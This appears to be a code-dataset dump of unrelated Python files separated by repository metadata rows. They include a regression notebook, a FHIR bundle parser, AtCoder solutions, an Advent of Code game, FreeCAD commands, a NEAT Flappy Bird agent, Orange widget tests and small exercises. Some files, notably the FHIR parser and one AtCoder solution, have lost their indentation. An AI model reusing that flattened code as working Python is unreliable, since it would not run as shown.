# setup linear regression for tangerine production
tang_reg = linear_model.LinearRegression()
tang_reg.fit(miami[['Average Temperature', 'Average Rainfall']], miami['Tangerines'])
# coefficients
tang_reg.coef_
# In[8]:
# intercept
tang_reg.intercept_
# In[9]:
# get correlation between temperature and tangerines produced
miami['Average Temperature'].corr(miami['Tangerines'])
# In[10]:
# get correlation between rainfall and tangerines produced
miami['Average Rainfall'].corr(miami['Tangerines'])
# In[11]:
# plot graph of tangerine production vs average temperature
sns.set_theme()
tang_temp_graph = sns.lmplot(
data=miami,
x="Average Temperature", y="Tangerines",
height=5
)
tang_temp_graph.set_axis_labels("Average Temperature (Fahrenheit)", "Tangerines Produced (1000 MT)")
# In[ ]:
# In[12]:
# plot graph of tangerine production vs average rainfall
tang_rain_graph = sns.lmplot(
data=miami,
x="Average Rainfall", y="Tangerines",
height=5
)
tang_rain_graph.set_axis_labels("Average Rainfall (inches)", "Tangerines Produced (1000 MT)")
| brandonzPB/economics_data_analysis | 187/ANALYSIS_miami_tangerines.py | ANALYSIS_miami_tangerines.py | py | 1,344 | python | en | code | 0 | github-code | 90 |
16795996520 | import logging
from fhir.resources.bundle import Bundle
from fhir.resources.reference import Reference
from fhir.resources.patient import Patient
from fhir.resources.practitionerrole import PractitionerRole
from fhir.resources.servicerequest import ServiceRequest
from collections import OrderedDict
logger = logging.getLogger('bserfeedbackapi.util.bundleparser')
def find_subject(bundle: Bundle, service_request: ServiceRequest):
try:
patient_reference = service_request.subject.reference
except Exception:
raise LookupError(f"Failed finding ServiceRequest.subject reference. This is likely due to a missing ServiceRequest, and may not indicate an issue with the Patient directly.")
try:
patient = find_resource_by_reference(bundle, patient_reference)
except LookupError as e:
raise e
return patient
def find_resource_by_profile(bundle: Bundle, profile: str):
for entry in bundle.entry:
try:
if profile in entry.resource.meta.profile:
return entry.resource
except Exception:
logger.debug(f"Bundle entry {entry.fullUrl} does not have profile.")
raise LookupError(f"Resource with profile {profile} not found.")
def find_resource_by_id(bundle: Bundle, id: str):
for entry in bundle.entry:
if entry.resource.id == id:
return entry.resource
raise LookupError(f"Resource with id {id} not found.")
def find_resource_by_reference(bundle: Bundle, reference: Reference):
for entry in bundle.entry:
if entry.fullUrl == reference or reference.endswith(entry.fullUrl):
return entry.resource
elif f"{entry.resource.resource_type}/{entry.resource.id}" == reference:
return entry.resource
raise LookupError(f"Resource with reference {reference} not found.")
def get_references(resource, reference_list: list):
if type(resource) is not OrderedDict:
resource = resource.dict(exclude_none=True)
for k, v in resource.items():
if k == "reference":
reference_list.append(resource[k])
elif type(v) is list:
for item in v:
if type(item) is OrderedDict:
get_references(item, reference_list)
elif type(v) is OrderedDict:
get_references(v, reference_list)
return reference_list
def simplify_references(resource):
if type(resource) is not OrderedDict:
resource = resource.dict(exclude_none=True)
for k, v in resource.items():
if k == "reference":
resource[k] = clean_reference_url(v)
elif type(v) is list:
for item in v:
if type(item) is OrderedDict:
simplify_references(item)
elif type(v) is OrderedDict:
simplify_references(v)
return resource
def clean_reference_url(reference: str):
split_string = reference.split("/")[-2:]
recombined_string = f"{split_string[-2]}/{split_string[-1]}"
return recombined_string | BSeR-PoC/BSeR-Recipient-API | util/bundleparser.py | bundleparser.py | py | 3,039 | python | en | code | 0 | github-code | 90 |
18540792549 | from collections import Counter
n=int(input())
a=list(map(int,input().split()))
s=[0]*(n+1)
for i in range(n):
s[i+1] = s[i] + a[i]
c = Counter(s)
n = set(s)
ans = 0
for i in n:
ans += ((c[i]*(c[i]-1))//2)
print(ans) | Aasthaengg/IBMdataset | Python_codes/p03363/s496899257.py | s496899257.py | py | 224 | python | en | code | 0 | github-code | 90 |
18050010119 | N=int(input())
T=list(map(int,input().split()))
A=list(map(int,input().split()))
cand=[-1]*N
cand2=[-1]*N
flag=1
ans=1
p=10**9+7
for i in range(N):
if i==0:
cand[i]=T[i]
else:
if T[i]!=T[i-1]:
cand[i]=T[i]
for i in range(N-1,-1,-1):
if i==N-1:
cand2[i]=A[i]
else:
if A[i]!=A[i+1]:
cand2[i]=A[i]
#print(cand)
#print(cand2)
ans=1
for i in range(N):
if (cand[i]==-1)and(cand2[i]==-1):
ans=(ans*min(T[i],A[i]))%p
elif (cand[i]==-1):
if T[i]<cand2[i]:
ans=0
elif (cand2[i]==-1):
if A[i]<cand[i]:
ans=0
else:
if cand[i]!=cand2[i]:
ans=0
print(ans)
#print(flag,cand)
"""
lmax=[0]*N
rmax=[0]*N
for i in range(N):
if i==0:
lmax[i]=cand[i]
rmax[N-1-i]=cand[N-1-i]
else:
if cand[i]==-1:
lmax[i]=lmax[i-1]
else:
lmax[i]=cand[i]
if cand[N-i-1]==-1:
rmax[N-i-1]=rmax[N-i]
else:
rmax[N-i-1]=cand[N-i-1]
#print(lmax,rmax)
for i in range(N):
if cand[i]==-1:
ans=(ans*min(A[i],T[i]))%p
if flag==0:
print("0")
else:
print(ans%p)
""" | Aasthaengg/IBMdataset | Python_codes/p03959/s567131683.py | s567131683.py | py | 1,197 | python | en | code | 0 | github-code | 90 |
74775105895 | #!/usr/bin/env python3
from collections import deque
from copy import deepcopy
from utils import read_input
TEST_INPUT = [
"Player 1:",
"9",
"2",
"6",
"3",
"1",
"",
"Player 2:",
"5",
"8",
"4",
"7",
"10",
]
TEST_INPUT_2 = [
"Player 1:",
"43",
"19",
"",
"Player 2:",
"2",
"29",
"14",
]
def create_decks(file_input: list) -> dict:
"""
Reads the file input and sorts the cards into the appropriate decks.
Args:
file_input: A list of lines from the input file
Returns:
A dict containing each player's deck.
"""
decks = {}
for line in file_input:
if line.startswith("Player"):
key = line.strip(":")
decks[key] = deque()
elif line:
decks[key].append(int(line))
return decks
def simulate_round(decks: dict) -> dict:
"""
Simulates a round of 'Combat' by comparing the top card of each deck. The deck with
the higher card places that card under its' deck followed by the other deck's
card.
Args:
decks: A dict containing the deck of each player
Returns:
A dict containing the updated decks.
"""
p1_card = decks["Player 1"].popleft()
p2_card = decks["Player 2"].popleft()
if p1_card > p2_card:
decks["Player 1"].append(p1_card)
decks["Player 1"].append(p2_card)
elif p2_card > p1_card:
decks["Player 2"].append(p2_card)
decks["Player 2"].append(p1_card)
return decks
def simulate_recursive_round(decks: dict, history: list) -> tuple:
if decks in history:
decks["Player 2"] = deque()
return decks, history
history.append(deepcopy(decks))
p1_card = decks["Player 1"].popleft()
p2_card = decks["Player 2"].popleft()
if p1_card <= len(decks["Player 1"]) and p2_card <= len(decks["Player 2"]):
p1_subdeck = list(decks["Player 1"])[0:p1_card]
p2_subdeck = list(decks["Player 2"])[0:p2_card]
if max(p1_subdeck) > max(p2_subdeck):
decks["Player 1"].append(p1_card)
decks["Player 1"].append(p2_card)
else:
subdecks = {"Player 1": deque(p1_subdeck), "Player 2": deque(p2_subdeck)}
subgame_winner = simulate_recursive_game(subdecks)["player"]
if subgame_winner == "Player 1":
decks["Player 1"].append(p1_card)
decks["Player 1"].append(p2_card)
elif subgame_winner == "Player 2":
decks["Player 2"].append(p2_card)
decks["Player 2"].append(p1_card)
return decks, history
elif p1_card > p2_card:
decks["Player 1"].append(p1_card)
decks["Player 1"].append(p2_card)
elif p2_card > p1_card:
decks["Player 2"].append(p2_card)
decks["Player 2"].append(p1_card)
return decks, history
def simulate_standard_game(decks: dict) -> deque:
"""
Simulates a standard game of 'Combat' by running rounds until one of the players
holds all of the cards.
Args:
decks: A dict containing each player's starting deck
Returns:
A deque containing the winner's deck.
"""
while len(decks["Player 1"]) > 0 and len(decks["Player 2"]) > 0:
decks = simulate_round(decks)
for player, deck in decks.items():
if deck:
return {"player": player, "deck": deck}
def simulate_recursive_game(decks: dict) -> deque:
"""
Simulates a game of 'Recursive Combat'.
Args:
decks: A dict containing each player's starting deck
Returns:
A deque containing the winner's deque.
"""
history = []
while len(decks["Player 1"]) > 0 and len(decks["Player 2"]) > 0:
decks, history = simulate_recursive_round(decks, history)
for player, deck in decks.items():
if deck:
return {"player": player, "deck": deck}
def calculate_score(winner_deck: deque) -> int:
"""
Calculates the score by multiplying each card in the deck by its position starting
at the bottom.
Args:
winner_deck: A deque contining the contents of the winner's deck
Returns:
An integer specifying the winner's score.
"""
multiplier, score = 0, 0
while len(winner_deck) > 0:
multiplier += 1
score += winner_deck.pop() * multiplier
return score
def part_one(file_input: list) -> int:
decks = create_decks(file_input)
winner = simulate_standard_game(decks)
winner_deck = winner["deck"]
return calculate_score(winner_deck)
def part_two(file_input: list) -> int:
decks = create_decks(file_input)
winner_deck = simulate_recursive_game(decks)["deck"]
return calculate_score(winner_deck)
if __name__ == "__main__":
INPUT = read_input(22)
# INPUT = TEST_INPUT
print(part_one(INPUT))
print(part_two(INPUT))
| ericrochow/AoC_20 | solutions/day22.py | day22.py | py | 4,921 | python | en | code | 1 | github-code | 90 |
25663613806 | target = int(input())
arr = input("")
num = [int(n) for n in arr.split()]
n = len(num)
for i in range(n):
for j in range(i + 1, n):
a= num[i]
b= num[j]
if a + b == target:
print(i,j)
| lyj-zhanghong/lecode1 | main.py | main.py | py | 223 | python | en | code | 0 | github-code | 90 |
18583983189 | N,A,B=input().split()
sum=0
for i in range(int(N)+1):
nums = list(str(i))
tmp = 0
for j in nums:
tmp = tmp + int(j)
if int(A)<=tmp:
if tmp<=int(B):
sum = sum + i
print(sum)
| Aasthaengg/IBMdataset | Python_codes/p03478/s057299295.py | s057299295.py | py | 218 | python | en | code | 0 | github-code | 90 |
2026817985 | import FreeCAD
import FreeCADGui
from pivy import coin
import os
class AddTriangle:
def __init__(self):
self.Path = os.path.dirname(__file__)
self.resources = {
'Pixmap': self.Path + '/../Resources/Icons/EditSurface.svg',
'MenuText': "Add Triangle",
'ToolTip': "Add a triangle to selected surface."
}
def GetResources(self):
# Return the command resources dictionary
return self.resources
def Activated(self):
FreeCADGui.runCommand("Mesh_AddFacet")
FreeCADGui.addCommand('Add Triangle', AddTriangle())
class DeleteTriangle:
def __init__(self):
self.Path = os.path.dirname(__file__)
self.resources = {
'Pixmap': self.Path + '/../Resources/Icons/EditSurface.svg',
'MenuText': "Delete Triangle",
'ToolTip': "Delete triangles from selected surface."
}
def GetResources(self):
# Return the command resources dictionary
return self.resources
@staticmethod
def Activated():
FreeCADGui.runCommand("Mesh_RemoveComponents")
FreeCADGui.addCommand('Delete Triangle', DeleteTriangle())
class SwapEdge:
def __init__(self):
self.Path = os.path.dirname(__file__)
self.resources = {
'Pixmap': self.Path + '/../Resources/Icons/EditSurface.svg',
'MenuText': "Swap Edge",
'ToolTip': "Swap Edge of selected surface."
}
def GetResources(self):
# Return the command resources dictionary
return self.resources
def Activated(self):
self.FaceIndexes = []
self.MC = FreeCADGui.ActiveDocument.ActiveView.addEventCallbackPivy(
coin.SoMouseButtonEvent.getClassTypeId(), self.SwapEdge)
def SwapEdge(self, cb):
event = cb.getEvent()
if event.getButton() == coin.SoMouseButtonEvent.BUTTON2 \
and event.getState() == coin.SoMouseButtonEvent.DOWN:
FreeCADGui.ActiveDocument.ActiveView.removeEventCallbackPivy(
coin.SoMouseButtonEvent.getClassTypeId(), self.MC)
if event.getButton() == coin.SoMouseButtonEvent.BUTTON1 \
and event.getState() == coin.SoMouseButtonEvent.DOWN:
pp = cb.getPickedPoint()
if pp is not None:
detail = pp.getDetail()
if detail.isOfType(coin.SoFaceDetail.getClassTypeId()):
face_detail = coin.cast(
detail, str(detail.getTypeId().getName()))
index = face_detail.getFaceIndex()
self.FaceIndexes.append(index)
if len(self.FaceIndexes) == 2:
surface = FreeCADGui.Selection.getSelection()[-1]
CopyMesh = surface.Mesh.copy()
try:
CopyMesh.swapEdge(
self.FaceIndexes[0], self.FaceIndexes[1])
except:
pass
surface.Mesh = CopyMesh
self.FaceIndexes.clear()
FreeCADGui.addCommand('Swap Edge', SwapEdge())
class SmoothSurface:
def __init__(self):
self.Path = os.path.dirname(__file__)
self.resources = {
'Pixmap': self.Path + '/../Resources/Icons/EditSurface.svg',
'MenuText': "Smooth Surface",
'ToolTip': "Smooth selected surface."
}
def GetResources(self):
# Return the command resources dictionary
return self.resources
@staticmethod
def Activated():
surface = FreeCADGui.Selection.getSelection()[0]
surface.Mesh.smooth()
FreeCADGui.addCommand('Smooth Surface', SmoothSurface())
| GitHub-XK/FreeCAD-Geomatics-Workbench | Surfaces/EditSurface.py | EditSurface.py | py | 3,819 | python | en | code | 0 | github-code | 90 |
32420595365 | '''
Practice Project: Teaching an AI to Play Flappy Bird using an Evolutionary Algorithm
Watts Dietrich
Nov 9 2020
In this practice project, the evolutionary AI algorithm called NEAT (NeuroEvolution of Augmenting Topologies)
is used to teach an AI to play the game "Flappy Bird." See the readme for more info.
'''
import pygame
import neat
import time
import os
import random
pygame.font.init()
# Set window size
WIN_WIDTH = 500
WIN_HEIGHT = 800
# Get images
BIRD_IMGS = [pygame.transform.scale2x(pygame.image.load(os.path.join("imgs", "bird1.png"))),
pygame.transform.scale2x(pygame.image.load(os.path.join("imgs", "bird2.png"))),
pygame.transform.scale2x(pygame.image.load(os.path.join("imgs", "bird3.png")))]
PIPE_IMG = pygame.transform.scale2x(pygame.image.load(os.path.join("imgs", "pipe.png")))
BASE_IMG = pygame.transform.scale2x(pygame.image.load(os.path.join("imgs", "base.png")))
BG_IMG = pygame.transform.scale2x(pygame.image.load(os.path.join("imgs", "bg.png")))
# Font for the score
STAT_FONT = pygame.font.SysFont("comicsans", 50)
GEN = 0
class Bird:
# Define some constants
IMGS = BIRD_IMGS
MAX_ROTATION = 25 # This defines the mas degrees that the bird image can rotate while going up or down
ROT_VEL = 20 # Rotation velocity: how much the bird can rotate per frame of animation
ANIMATION_TIME = 5 # How long each animation will take
def __init__(self, x, y):
# Define initial conditions of the bird
self.x = x
self.y = y
self.tilt = 0
self.tick_count = 0
self.vel = 0
self.height = self.y
self.img_count = 0
self.img = self.IMGS[0]
# jump() is what happens when the bird jumps upward
def jump(self):
self.vel = -10.5 # Note: in pygame, the top-left window corner is (0,0), so to go up, a negative vel is needed
self.tick_count = 0 # Reset the counter that keeps track of when the last jump occurred
self.height = self.y # The starting height of the jump
# move() is called each frame to move the bird
def move(self):
self.tick_count += 1 # increment the tick_count (time since last jump)
# Calculate displacement d, the number of pixels up or down the bird will move this frame
d = self.vel * self.tick_count + 1.5 * self.tick_count**2
# Set terminal velocity
if d >= 16:
d = 16
# This is a tuning mechanism. Fiddle with this to change the overall height of a jump
if d < 0:
d -= 2
# Update y position based on calculated displacement
self.y = self.y + d
# Tilt the bird according to movement
if d < 0 or self.y < self.height + 50:
if self.tilt < self.MAX_ROTATION:
self.tilt = self.MAX_ROTATION
else:
if self.tilt > -90:
self.tilt -= self.ROT_VEL
# Draw the bird.
def draw(self, win):
self.img_count += 1 # increment image counter
# Choose bird image based on image counter, animation time, cycle back and forth through the images
if self.img_count <= self.ANIMATION_TIME:
self.img = self.IMGS[0]
elif self.img_count <= self.ANIMATION_TIME*2:
self.img = self.IMGS[1]
elif self.img_count <= self.ANIMATION_TIME*3:
self.img = self.IMGS[2]
elif self.img_count <= self.ANIMATION_TIME*4:
self.img = self.IMGS[1]
elif self.img_count == self.ANIMATION_TIME*5:
self.img = self.IMGS[0]
self.img_count = 0 # reset image counter
# If the bird is diving hard, display just bird2.png, so it looks like it's gliding
if self.tilt <= -80:
self.img = self.IMGS[1]
self.img_count = self.ANIMATION_TIME*2
# Rotate image about its center based on current tilt
rotated_image = pygame.transform.rotate(self.img, self.tilt)
new_rect = rotated_image.get_rect(center = self.img.get_rect(topleft = (self.x, self.y)).center)
win.blit(rotated_image, new_rect.topleft)
# This returns info needed for collision detection
def get_mask(self):
return pygame.mask.from_surface(self.img)
class Pipe:
GAP = 200 # The space between pipes
VEL = 5 # How fast the pipes move
def __init__(self, x):
self.x = x
self.height = 0
self.gap = 100 # Gap size
self.top = 0 # Will store position where top of pipe will be drawn
self.bottom = 0 # Will store position where bottom of pipe will be drawn
self.PIPE_TOP = pygame.transform.flip(PIPE_IMG, False, True)
self.PIPE_BOTTOM = PIPE_IMG
self.passed = False # When bird passes the pipe, this is set to True
self.set_height()
def set_height(self):
self.height = random.randrange(50, 450) # Height is the top of the gap
self.top = self.height - self.PIPE_TOP.get_height() # Top is the top-left corner of the pipe image
self.bottom = self.height + self.GAP # Bottom is the bottom of the gap
def move(self):
self.x -= self.VEL
def draw(self, win):
win.blit(self.PIPE_TOP, (self.x, self.top))
win.blit(self.PIPE_BOTTOM, (self.x, self.bottom))
# Collision detection
# Uses pygame masks to determine if drawn pixels are colliding
def collide(self, bird):
bird_mask = bird.get_mask()
top_mask = pygame.mask.from_surface(self.PIPE_TOP)
bottom_mask = pygame.mask.from_surface(self.PIPE_BOTTOM)
top_offset = (self.x - bird.x, self.top - round(bird.y))
bottom_offset = (self.x - bird.x, self.bottom - round(bird.y))
# Get collision points, if any. These are set to None if no collision
b_point = bird_mask.overlap(bottom_mask, bottom_offset)
t_point = bird_mask.overlap(top_mask, top_offset)
# Check for collision
if t_point or b_point:
return True
return False
# The Base class uses cycles two images of the ground through the canvas to create the illusion of movement
class Base:
VEL = 5
WIDTH = BASE_IMG.get_width()
IMG = BASE_IMG
def __init__(self, y):
self.y = y
self.x1 = 0 # position of the 1st image
self.x2 = self.WIDTH # position of the 2nd image
def move(self):
self.x1 -= self.VEL
self.x2 -= self.VEL
# If 1st image scrolls off the screen, cycles it back behind the 2nd image
if self.x1 + self.WIDTH <0:
self.x1 = self.x2 + self.WIDTH
if self.x2 + self.WIDTH <0:
self.x2 = self.x1 + self.WIDTH
def draw(self, win):
win.blit(self.IMG, (self.x1, self.y))
win.blit(self.IMG, (self.x2, self.y))
def draw_window(win, birds, pipes, base, score, gen, living):
# Note that blit() simply draws something on the screen
# Draw the background
win.blit(BG_IMG, (0,0))
# Draw pipes
for pipe in pipes:
pipe.draw(win)
# Draw score
text = STAT_FONT.render("Score: " + str(score), 1, (255,255,255))
win.blit(text, (WIN_WIDTH - 10 - text.get_width(), 10))
# Display generation count
text = STAT_FONT.render("Gen: " + str(gen), 1, (255, 255, 255))
win.blit(text, (10, 10))
# Display number of living birds
text = STAT_FONT.render("Birds: " + str(living), 1, (255, 255, 255))
win.blit(text, (10, 50))
# Draw base
base.draw(win)
# Draw bird
for bird in birds:
bird.draw(win)
pygame.display.update()
# This main() function doubles as the fitness function that is passed to the NEAT algorithm in run() below
def main(genomes, config):
global GEN
GEN += 1
nets = [] # Stores the neural networks for each bird
ge = [] # Stores the genomes for each bird
birds = [] # Stores info specific to each bird
# Initialize all neural networks, genomes, birds
for _, g in genomes:
net = neat.nn.FeedForwardNetwork.create(g, config)
nets.append(net)
birds.append(Bird(230,350))
g.fitness = 0
ge.append(g)
base = Base(730)
pipes = [Pipe(600)]
win = pygame.display.set_mode((WIN_WIDTH, WIN_HEIGHT))
clock = pygame.time.Clock()
score = 0
run = True
while run:
clock.tick(30)
for event in pygame.event.get():
if event.type == pygame.QUIT:
run = False
pygame.quit()
quit()
# Need to ensure birds move according to next pipe, ignore passed pipes
pipe_ind = 0
if len(birds) > 0:
if len(pipes) > 1 and birds[0].x > pipes[0].x + pipes[0].PIPE_TOP.get_width():
pipe_ind = 1
else:
run = False
break
for x, bird in enumerate(birds):
bird.move()
ge[x].fitness += 0.1 # Increase fitness slightly for moving forward
# Get neural network output
output = nets[x].activate((bird.y, abs(bird.y - pipes[pipe_ind].height), abs(bird.y - pipes[pipe_ind].bottom)))
# Get birds to jump when the network tells them to
if output[0] > 0.5:
bird.jump()
add_pipe = False
rem = [] # This stores pipes to be removed
# Remove birds that collide and their associated genomes, networks
for pipe in pipes:
for x, bird in enumerate(birds):
if pipe.collide(bird):
ge[x].fitness -= 1
birds.pop(x)
nets.pop(x)
ge.pop(x)
# Once the bird passes a pipe, call for a new pipe to be generated
if not pipe.passed and pipe.x < bird.x:
pipe.passed = True
add_pipe = True
# Remove pipes as they leave the screen
if pipe.x + pipe.PIPE_TOP.get_width() < 0:
rem.append(pipe)
pipe.move()
# Make a new pipe and increment score
if add_pipe:
score += 1
# Increase fitness for surviving birds
for g in ge:
g.fitness += 5
pipes.append(Pipe(600))
# Remove old pipes
for r in rem:
pipes.remove(r)
# If bird hits the ground, or flies off top of screen, remove it
for x, bird in enumerate(birds):
if bird.y + bird.img.get_height() >= 730 or bird.y < 0:
birds.pop(x)
nets.pop(x)
ge.pop(x)
base.move()
living = len(birds)
draw_window(win, birds, pipes, base, score, GEN, living)
def run(config_path):
config = neat.config.Config(neat.DefaultGenome, neat.DefaultReproduction, neat.DefaultSpeciesSet,
neat.DefaultStagnation, config_path)
# Generate a population
p = neat.Population(config)
# Output statistics
p.add_reporter(neat.StdOutReporter(True))
stats = neat.StatisticsReporter()
p.add_reporter(stats)
# Determine winners using fitness function
winner = p.run(main, 50)
if __name__ == "__main__":
local_dir = os.path.dirname(__file__)
config_path = os.path.join(local_dir, "config-feedforward.txt")
run(config_path)
| TerraWatts/AI-FlappyBird | FlappyBird.py | FlappyBird.py | py | 11,382 | python | en | code | 0 | github-code | 90 |
37431938854 | import pygame, os, random,pygame.font
pygame.init()
gameWidth = 840
gameHeight = 640
picSize = 128
gameColumns = 4
gameRows = 3
padding = 10
leftMargin = (gameWidth - ((picSize + padding) * gameColumns)) // 2
rightMargin = leftMargin
topMargin = (gameHeight - ((picSize + padding) * gameRows)) // 2
bottomMargin = topMargin
WHITE = (255, 255, 255)
BLACK = (0, 0, 0)
selection1 = None
selection2 = None
# Chargement de la page de jeux
screen = pygame.display.set_mode((gameWidth, gameHeight))
pygame.display.set_caption('Memory Game')
# Créer la liste des images
memoryPictures = []
for item in os.listdir('images/'):
memoryPictures.append(item.split('.')[0])
memoryPicturesCopy = memoryPictures.copy()
memoryPictures.extend(memoryPicturesCopy)
memoryPicturesCopy.clear()
random.shuffle(memoryPictures)
# Chargement des images
memPics = []
memPicsRect = []
hiddenImages = []
for item in memoryPictures:
picture = pygame.image.load(f'images/{item}.png')
picture = pygame.transform.scale(picture, (picSize, picSize))
memPics.append(picture)
pictureRect = picture.get_rect()
memPicsRect.append(pictureRect)
for i in range(len(memPicsRect)):
memPicsRect[i][0] = leftMargin + ((picSize + padding) * (i % gameColumns))
memPicsRect[i][1] = topMargin + ((picSize + padding) * (i % gameRows))
hiddenImages.append(False)
print(memoryPictures)
print(memPics)
print(memPicsRect)
print(hiddenImages)
gameLoop = True
while gameLoop:
for event in pygame.event.get():
if event.type == pygame.QUIT:
gameLoop = False
if event.type == pygame.MOUSEBUTTONDOWN and event.button == 1:
for item in memPicsRect:
if item.collidepoint(event.pos):
if hiddenImages[memPicsRect.index(item)] != True:
if selection1 != None:
selection2 = memPicsRect.index(item)
hiddenImages[selection2] = True
else:
selection1 = memPicsRect.index(item)
hiddenImages[selection1] = True
for i in range(len(memoryPictures)):
if hiddenImages[i] == True:
screen.blit(memPics[i], memPicsRect[i])
else:
pygame.draw.rect(screen, WHITE, (memPicsRect[i][0], memPicsRect[i][1], picSize, picSize))
pygame.display.update()
if selection1 != None and selection2 != None:
if memoryPictures[selection1] == memoryPictures[selection2]:
selection1, selection2 = None, None
else:
pygame.time.wait(1000)
hiddenImages[selection1] = False
hiddenImages[selection2] = False
selection1, selection2 = None, None
win = 1
for number in range(len(hiddenImages)):
win *= hiddenImages[number]
if win == 1:
gameLoop = False
pygame.display.update()
pygame.quit() | XaviLami/python_learn | jeux.py | jeux.py | py | 2,935 | python | en | code | 0 | github-code | 90 |
18109695839 | n,q = [int(s) for s in input().split()]
queue = []
for i in range(n):
name,time = input().split()
queue.append([name,int(time)])
time = 0
while queue:
processing = queue.pop(0)
t = min(processing[1], q)
time += t
processing[1] -= t
if processing[1] == 0:
print(processing[0],time)
else:
queue.append(processing) | Aasthaengg/IBMdataset | Python_codes/p02264/s368571736.py | s368571736.py | py | 324 | python | en | code | 0 | github-code | 90 |
35225767719 | # pylint: disable=missing-docstring,protected-access
from AnyQt.QtCore import Qt
from AnyQt.QtWidgets import QApplication
from Orange.data import Table
from Orange.widgets.tests.base import WidgetTest, WidgetOutputsTestMixin
from Orange.classification import CN2Learner
from Orange.widgets.visualize.owruleviewer import OWRuleViewer
class TestOWRuleViewer(WidgetTest, WidgetOutputsTestMixin):
@classmethod
def setUpClass(cls):
super().setUpClass()
WidgetOutputsTestMixin.init(cls)
cls.titanic = Table('titanic')
cls.learner = CN2Learner()
cls.classifier = cls.learner(cls.titanic)
# CN2Learner does not add `instances` attribute to the model, but
# the Rules widget does. We simulate the model we get from the widget.
cls.classifier.instances = cls.titanic
cls.signal_name = OWRuleViewer.Inputs.classifier
cls.signal_data = cls.classifier
cls.data = cls.titanic
def setUp(self):
self.widget = self.create_widget(OWRuleViewer)
def test_set_data(self):
# data must be None before assignment
self.assertIsNone(self.widget.data)
self.assertIsNone(self.get_output(self.widget.Outputs.selected_data))
# assign None data
self.send_signal(self.widget.Inputs.data, None)
self.assertIsNone(self.widget.data)
self.assertIsNone(self.get_output(self.widget.Outputs.selected_data))
# assign data
self.send_signal(self.widget.Inputs.data, self.titanic)
self.assertEqual(self.titanic, self.widget.data)
# output signal should not be sent without a classifier
self.assertIsNone(self.get_output(self.widget.Outputs.selected_data))
# remove data
self.send_signal(self.widget.Inputs.data, None)
self.assertIsNone(self.widget.data)
self.assertIsNone(self.get_output(self.widget.Outputs.selected_data))
def test_set_classifier(self):
# classifier must be None before assignment
self.assertIsNone(self.widget.data)
self.assertIsNone(self.widget.classifier)
self.assertIsNone(self.widget.selected)
# assign the classifier
self.send_signal(self.widget.Inputs.classifier, self.classifier)
self.assertIsNone(self.widget.data)
self.assertIsNotNone(self.widget.classifier)
self.assertIsNone(self.widget.selected)
# without data also set, the output should be None
self.assertIsNone(self.get_output(self.widget.Outputs.selected_data))
def test_filtered_data_output(self):
self.send_signal(self.widget.Inputs.data, self.titanic)
self.send_signal(self.widget.Inputs.classifier, self.classifier)
# select the last rule (TRUE)
selection_model = self.widget.view.selectionModel()
selection_model.select(
self.widget.proxy_model.index(
len(self.classifier.rule_list) - 1, 0),
selection_model.Select | selection_model.Rows)
# the number of output data instances (filtered)
# must match the size of titanic data-set
output = self.get_output(self.widget.Outputs.selected_data)
self.assertEqual(len(self.titanic), len(output))
# clear selection,
selection_model.clearSelection()
# output should now be None
self.assertIsNone(self.get_output(self.widget.Outputs.selected_data))
def test_copy_to_clipboard(self):
self.send_signal(self.widget.Inputs.classifier, self.classifier)
# select the last rule (TRUE)
selection_model = self.widget.view.selectionModel()
selection_model.select(
self.widget.proxy_model.index(
len(self.classifier.rule_list) - 1, 0),
selection_model.Select | selection_model.Rows)
# copy the selection and test if correct
self.widget.copy_to_clipboard()
clipboard_contents = QApplication.clipboard().text()
self.assertTrue(self.classifier.rule_list[-1].__str__() ==
clipboard_contents)
def test_restore_original_order(self):
self.send_signal(self.widget.Inputs.classifier, self.classifier)
bottom_row = len(self.classifier.rule_list) - 1
# sort the table
self.widget.proxy_model.sort(0, Qt.AscendingOrder)
# bottom row QIndex
q_index = self.widget.proxy_model.index(bottom_row, 0)
self.assertEqual(bottom_row, q_index.row())
# translate to TableModel QIndex
q_index = self.widget.proxy_model.mapToSource(q_index)
# the row indices do NOT match
self.assertNotEqual(bottom_row, q_index.row())
# restore original order
self.widget.restore_original_order()
# repeat the process
q_index = self.widget.proxy_model.index(bottom_row, 0)
self.assertEqual(bottom_row, q_index.row())
# translate to TableModel QIndex
q_index = self.widget.proxy_model.mapToSource(q_index)
# the row indices now match
self.assertEqual(bottom_row, q_index.row())
def test_selection_compact_view(self):
self.send_signal(self.widget.Inputs.classifier, self.classifier)
# test that selection persists through view change
selection_model = self.widget.view.selectionModel()
selection_model.select(self.widget.proxy_model.index(0, 0),
selection_model.Select | selection_model.Rows)
self.widget._save_selected(actual=True)
temp = self.widget.selected
# update (compact view)
self.widget.on_update()
self.widget._save_selected(actual=True)
# test that the selection persists
self.assertEqual(temp, self.widget.selected)
def _select_data(self):
selection_model = self.widget.view.selectionModel()
selection_model.select(self.widget.proxy_model.index(2, 0),
selection_model.Select | selection_model.Rows)
return list(range(586, 597))
| biolab/orange3 | Orange/widgets/visualize/tests/test_owruleviewer.py | test_owruleviewer.py | py | 6,069 | python | en | code | 4,360 | github-code | 90 |
43441834717 | import csv
import pathlib
root = pathlib.Path(__file__).parent
files_path = root.joinpath("files")
# citire fisier csv
try:
with open(files_path.joinpath("salarii.csv")) as fin:
reader = list(csv.reader(fin))
except OSError:
print("File error.")
else:
lista_salarii = []
for i in reader:
lista_salarii.append(float(i[3]))
print(f"Total salarii: {sum(lista_salarii)}")
# citire fisier csv cu nume campuri
# field_names = [
# "first_name",
# "last_name",
# "id",
# "gros_salary",
# "days_off"
# ]
# try:
# with open(files_path.joinpath("salarii.csv")) as fin:
# # list -> extrage datele din generator
# dict_reader = list(csv.DictReader(fin, fieldnames=field_names))
# for i in dict_reader:
# print(i)
# except OSError:
# print("File error.")
# scriere csv
try:
with open(files_path.joinpath("bonuri.csv"), "w") as fout:
csv_writer = csv.writer(fout, lineterminator='\n')
for i in reader:
bonuri = 20 - int(i[4])
valoare_bonuri = bonuri * 20
zile_libere = int(i[4])
csv_writer.writerow([i[0], i[1], bonuri, valoare_bonuri])
except OSError:
print("File write error.")
# csv.DictWriter - get a dict for each line
# un bon costa 20 de lei
# 20 de zile lucratoare toate | tohhhi/it_school_2022 | Sesiunea 22/practice.py | practice.py | py | 1,360 | python | en | code | 0 | github-code | 90 |
43033298957 | # Dynamic Programming minimum coin sum #
def minCoins(coins,sum):
sumArr = [sum+100] * (sum+1)
sumArr[0] = 0
for i in range(1,sum+1):
for v in coins:
if v<=i and (sumArr[i-v]+1 < sumArr[i]):
sumArr[i] = sumArr[i-v]+1
return sumArr[sum]
coins = list(map(int,input().split(" ")))
sum = int(input())
print(minCoins(coins,sum))
